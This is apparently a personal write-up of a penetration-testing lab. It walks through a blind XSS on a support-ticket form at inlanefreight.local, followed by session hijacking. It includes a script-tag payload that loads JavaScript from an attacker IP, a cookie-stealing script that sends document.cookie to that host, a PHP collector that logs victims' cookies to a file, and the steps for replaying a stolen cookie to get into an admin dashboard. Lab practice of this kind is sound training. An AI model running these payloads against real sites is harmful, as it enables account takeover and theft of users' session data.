## `support.inlanefreight.local` - looks like `inlanefreight.local:8080` ![[images/Pasted image 20260628152057.png]] - submit test ticket via `/ticket.php` ![[images/Pasted image 20260630122138.png]] - `request:response` in burp ![[images/Pasted image 20260630122059.png]] - the fact that someone will review the ticket soon indicates that it's going to be clicked ### Fuzzing - directory![[images/Pasted image 20260630164638.png]] - page ![[images/Pasted image 20260630164631.png]] ### Blind XSS - based on the message we saw above, test for blind XSS with below ```javascript "><script src=http://10.10.15.114:9000/TESTING_THIS></script> ``` ![[images/Pasted image 20260630124030.png]] - we got a call back to our listener ![[images/Pasted image 20260630124301.png]] ### session hijacking - create `script.js` and `index.php` ```javascript document.location='http://10.10.15.114:8081/index.php?c='+document.cookie; ``` ```php <?php if (isset($_GET['c'])) { $list = explode(";", $_GET['c']); foreach ($list as $key => $value) { $cookie = urldecode($value); $file = fopen("cookies.txt", "a+"); fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n"); fclose($file); } } ?> ``` - then, host above files via php ```bash sudo php -S 0.0.0.0:8080 ``` - inject the XSS into the message field ```javascript "><script src=http://10.10.15.114:8081/script.js></script> ``` - got a hit on PHP server ![[images/Pasted image 20260630130201.png]] - cookie output to `cookies.txt` ![[images/Pasted image 20260630130228.png]] - browse to `login.php` amd open dev tools in firefox - enter `session` as name and string as `value`, then reload the page ![[images/Pasted image 20260630164408.png]] - we now have access to `dashboard.php` ![[images/Pasted image 20260630164427.png]]